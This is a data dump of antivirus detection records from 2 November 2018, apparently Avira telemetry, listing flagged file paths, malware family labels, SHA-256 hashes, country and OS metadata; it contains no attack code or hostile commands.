  Row(detection=Row(filename='6be026ee27f269917b7307db9f47e38c3dfb5a07ba6d4351cde088fc07fe6db1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6BE026EE27F269917B7307DB9F47E38C3DFB5A07BA6D4351CDE088FC07FE6DB1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6be026ee27f269917b7307db9f47e38c3dfb5a07ba6d4351cde088fc07fe6db1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101112-b3a0e6e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101112-B3A0E6E1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\InstallShield Installation Information\\{B773B178-2C91-4E90-A082-F2875AAEAF48}\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='493dc4bf0e6a9129419a5aa5577db34c925260c8f9eb25f4ba3aa31ed5d26e27', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3709256, timestamp='2018-11-02T20:08:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:53:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:21:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=9024000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='201ec53fc221b11362c6c0b74e3ae6277752cfee6f589a94b26c289dd919db94', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:17:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144153-97355f69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea22c0d5\\AVSCAN-20181102-144128-94472639\\AVSCAN-20181102-144153-97355F69', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45C7249BAEEAF3434CE18A12468B50B45F3A759D64E6DA922555D7B684828A59', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:23:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4974083\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:10:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T22:02:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jsttuexhdbmeluzs.jstt', filepath='\\\\?\\C:\\WINDOWS\\jsttuexhdbmeluzs.jstt', filesize=2048000, name='Adware/AD.Zdengo.ergtf.#M1.#R1'), hash='2d9f41e3b5a903cf6460d8a09db2c1df940e38949ca693fba65a0ee17d6a7b69', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T14:48:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0FF58FBE59A5A4D1457DCABED63F554044CE12FA439A3D7E72070800B978EC21', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:27:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='0d384ced57efb106befa0630b8f8b8e71496b95d2d4933f92d554945c1976081', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T16:06:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183232-813a38ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183232-813A38FF', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='\\\\?\\C:\\Program Files\\BAWTOKCVHE\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='1d897e351edd5f44a82441ad9231b346585178ee906f26056b28d8e195b561f9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0EAC87397CCF95D2F010A776B7DFDB718FE46B49511251AE348E303310F8915E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:54:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:15:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.260\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.260\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:02:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160919-2c3fafc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bec8d163\\AVSCAN-20181102-160754-20F40D80\\AVSCAN-20181102-160919-2C3FAFC6', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161657-4f2ca997', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6645ee91\\AVSCAN-20181102-161516-453FC779\\AVSCAN-20181102-161657-4F2CA997', filesize=128000, name='Adware/Elex.0dd3a5.#M1.#R1'), hash='0dd3a5f51f3139edc29338bf545981c0d56a9ff2fbc0c4b65a7d5607b89804b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\11A4B7E010799154DDC53E76332C031C22DADA19A2803E99942CF60196929396', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:48:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.759\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.759\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:52:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061447-91bcb613', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061447-91BCB613', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053128-84d852af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053128-84D852AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061456-970e17b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061456-970E17B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053111-7aaa05b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053111-7AAA05B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055204-651b7966', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055204-651B7966', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051515-40eadcd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051515-40EADCD7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pll_felag.exe', filepath='\\\\server\\prg\\programme\\prodressnet\\bin\\pll_felag.exe', filesize=1472000, name='HEUR/AGEN.1035060.#M1.#R1'), hash='5698f2c983b9ccd496677bda076cadbdf8cad6db3ebe230184899805cd313bb0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ZBMJ0h0kokGhICXL.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T06:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061220-3a53339d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061220-3A53339D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053950-b012275b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053950-B012275B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055625-010451cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055625-010451CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='resourcetree.exe', filepath='\\\\?\\I:\\Games\\Titan Quest Anniversary Edition Ragnarok\\ResourceTree.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='6f86dfaa4813591fa53893b0f0995b8a9c9e7aede0ee3531f9781f001ed09ba0', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054226-0cd50947', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054226-0CD50947', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wjvsjmgd.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\WJVsJmgD.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055259-863585ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055259-863585FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052814-10ea5941', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052814-10EA5941', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:13Z'), dt=datetime.date(2018, 11, 2)),
